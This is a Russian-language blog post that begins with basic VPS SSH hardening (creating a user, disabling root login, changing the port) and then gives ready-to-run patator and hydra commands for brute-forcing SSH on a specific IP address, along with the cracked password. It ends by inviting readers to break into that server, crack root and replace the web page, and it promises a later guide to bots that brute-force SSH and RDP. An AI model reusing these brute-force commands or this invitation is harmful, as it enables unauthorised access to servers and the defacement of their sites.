Практическое использование VPS, ssh и настройка nginx

Сегодня хотелось бы поговорить о чём-то интересном, что можно легко попробовать на практике как самому «зелёному» новичку, так и опытному взломщику серверов. Пожалуй, это отличная возможность подразмять свои «мускулы» и проверить на практике свои наработанные навыки. Думаю, вы одобрите данную затею. Ну что ж, приступим.

Давайте поговорим о выделенных серверах. Virtual Private Server (частный виртуальный сервер) сейчас не новинка и эти сервисы активно эксплуатируются для разных целей. Будь то фишинг или сайт который несет в себе вредоносный код, а может это бот, который сканирует сети и брутит доступные сервера. Вариантов может быть не мало.

Специально для сегодняшней статьи мы арендовали такой сервер и хотим показать вам некоторые важные моменты.

Во первых, когда сервер активируется, мы смело можем почитать логи в /var/log/auth.log

Серверу всего минут 10, а его уже брутят боты )) И это печально.

Надо сразу создать пользователя, и отключить в конфиге ssh вход из под root.

useradd -m -d /home/graytest graytest
Будет создан пользователь graytest с домашним каталогом graytest

passwd graytest — > обязательно, т.к. учетка будет отключена до ввода пароля =)

Прекрасно! Теперь идем в /etc/ssh/sshd_config с помощью любого редактора.

Надо изменить порт по умолчанию и PermitRootLogin поставить no

От направленного сканирования изменение порта не спасет, но от ботов хорошо работает.

Для начала неплохо, и мы уже защищены от автоматизированных атак, что определённо радует.

С направленным брутом бороться сложнее, особенно, если кто-то знает имя пользователя. Рассмотрим несколько вариантов брута ssh.

<h3 style=»text-align: left;»>1 — patator</h3>

python patator.py ssh_login host=82.146.44.7 port=2223 user=graytest password=FILE0 0=’/home/gray/Desktop/SecLists/Passwords/john.txt’ -x ignore:mesg=’Authentication failed.’

И как видно, пароль на данную учетку 12345678 :))

Порт был изменен в конфиге на 2223

<h3 style=»text-align: left;»>2 — hydra</h3>

hydra -l graytest -P ‘/home/gray/Desktop/SecLists/Passwords/john.txt’ -f -V -s 2223 82.146.44.7 ssh

<h3 style=»text-align: left;»>3 — ncrack</h3>

Он работает только со стандартным портом (22)

О медузе специально сказано не было т.к. она мне просто не нравится. Как настроить бота на сканирование сетей и брута ssh и rdp (дедики) я расскажу позже.

А сейчас НОВОСТЬ!

На сервере 82.146.44.7 были спрятаны 5 кусочков мозайки, которые вам надо найти и собрать воедино, и тогда получите сообщение. Можете делать, все что хотите…

Это отличная возможность проверить свои знания и навыки в поиске информации и взломе серверов!! Вам придется взломать пользователя root для успешного прохождения!!

Да, этот маленький квест для новичков в основном )) Но побаловаться может каждый. Не так ли? ))

Как поломаете root смените картинку в /var/www/html/index.., а пароль оставьте прежним ))

Вперёд!

Click to rate this post!
[Total: 10 Average: 3.9]

Leave a reply:

Your email address will not be published.